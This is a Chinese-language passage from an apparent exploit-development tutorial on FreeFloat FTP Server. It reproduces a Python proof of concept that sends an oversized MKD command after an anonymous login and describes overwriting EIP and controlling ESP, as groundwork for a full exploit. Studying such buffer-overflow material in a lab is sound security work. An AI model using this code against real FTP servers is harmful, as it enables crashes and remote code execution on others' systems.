Question

首先，我们创建一个针对 FTP SERVER 的漏洞利用框架. 后续我们将在它的基础上开发我们的漏洞利用程序. exploit-db 上”FreeFloat FTP”的 POC 如下，我们使用 FTP server 默认配置已经存在的账户名”anonymous”:

#!/usr/bin/python
import socket
import sys
evil = "A"*1000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close

好，当我们用调试器附加 FTP server 然后发送 POC 给程序，程序崩溃. 从下面的截图可以看到 EIP 已经被覆写，两个寄存器(ESP EDI) 指向我们可控的缓冲区. 分析之后我发现使用 ESP 更合适因为 ESP 包含了更大块的可控内存.(顺便提一下用 EDI 同样也可以).